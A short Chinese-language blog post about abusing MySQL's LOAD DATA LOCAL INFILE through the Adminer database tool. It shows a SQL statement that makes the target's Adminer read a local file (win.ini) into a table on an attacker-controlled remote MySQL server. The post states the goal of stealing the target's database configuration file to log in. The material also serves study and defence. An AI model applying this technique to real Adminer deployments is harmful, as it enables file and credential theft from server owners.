Mysql中Load Data语句在phpadminer中的利用

小透明yo 2019-09-26 10:22:25

起因:

和师傅们在群里面进行了一番学术性探讨,突然想起来有这么个东西,还是和领导偷的。

LOAD DATA语句介绍:

MySQL 中提供了LOAD DATA INFILE语句来插入数据。 以下实例中将从当前目录中读取文件 dump.txt ,将该文件中的数据插入到当前数据库的 mytbl 表中。

也就是说将客户端文件读入到mysql表中,phpadminer可以连接远程数据库,那么这样就可以在远程数据库中读到本地文件。

环境搭建:

adminer
远程服务器搭建mysql
开启mysql外链

环境搭建:

打开phpmyadminer页面,可以发现他允许链接远程数据:

这里我在百度云申请了一个免费的mysql云服务器:

然后使用phpadminer成功的登录了进来:

然后创建了一个test数据库以及name字段:

LOAD DATA读取数据:

SQL语句:

LOAD DATA LOCAL INFILE 'C:\\Windows\\win.ini' INTO TABLE table;

此时在进入云数据库查看我的win.ini 是不是导入到云服务器上去了:

小结:

也就是说,当目标使用phpadminner进行数据管理时,我们可以直接连接自己的数据库来达到读取客户端文件的目的。这样就可以直接读取到目标的数据库配置文件,在使用目标的phpadminer连接了。